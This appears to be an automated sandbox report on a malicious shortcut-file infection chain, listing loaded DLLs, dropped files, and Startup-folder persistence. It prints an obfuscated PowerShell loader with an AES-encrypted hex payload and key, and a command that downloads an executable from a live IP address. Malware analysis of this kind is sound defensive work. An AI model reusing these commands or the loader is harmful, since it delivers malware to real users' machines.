Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: duyba.lnk.download.lnkLNK file: ..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2270225640.000001D8EE742000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281480259.000001D8F2724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2731000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277177873.000001D8F2721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlockJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E56D64 LoadLibraryA,GetProcAddress,11_2_00007FF7C0E56D64
Source: ghep2[1].4.drStatic PE information: real checksum: 0x5f0d should be: 0x150ae
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF8485700BD pushad ; iretd 6_2_00007FF8485700C1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E87399 push rdi; ret 11_2_00007FF7C0E873A2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E878FD push rdi; ret 11_2_00007FF7C0E87904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF8485A00BD pushad ; iretd 18_2_00007FF8485A00C1
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D8B75 push ecx; ret 20_2_006D8B88
Source: C:\Users\Public\Guard.exeCode function: 20_2_006CCBF4 push eax; retf 20_2_006CCBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002B8B75 push ecx; ret 24_2_002B8B88

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exeJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E74514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00007FF7C0E74514
Source: C:\Users\Public\Guard.exeCode function: 20_2_007359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_007359B3
Source: C:\Users\Public\Guard.exeCode function: 20_2_006C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_006C5EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_003159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,24_2_003159B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002A5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,24_2_002A5EDA
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_006D33B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
